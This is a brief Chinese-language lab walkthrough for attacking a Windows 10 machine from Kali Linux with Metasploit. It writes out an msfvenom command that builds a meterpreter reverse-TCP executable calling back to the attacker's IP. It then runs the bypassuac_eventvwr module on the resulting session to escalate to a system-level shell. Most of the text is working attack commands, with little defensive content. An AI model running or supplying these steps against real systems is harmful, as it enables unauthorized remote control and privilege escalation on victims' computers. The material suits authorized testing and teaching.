在進行入侵檢測之前,配置好網絡環境,使其相互連通,才能進行入侵。在使用Metasploit成功入侵之後拿到的只是一個基礎的shell,要想拿到系統級別的shell,添加系統用戶,獲取用戶登錄口令,還需要進一步提權。
一、Metasploit對windows 10入侵測試 環境 攻擊機:Kali Linux 2019 ip:192.168.5.11 目標主機:Windows 10 ip:192.168.2.104
1.1生成exe文件,並在目標主機打開 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.11 LPORT=1000 -f exe -o met.exe
1.2.設置payload,設置本地IP和監聽端口 二、輸入background隱藏此界面,然後進一步提權msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然會生成另一個session,可以進行提權操作了,提權過程中並不需要設置端口號了,默認4444即可
2.2.獲得shell之後,敲入dir命令亂碼顯示,只要輸入chcp 65001,即可解決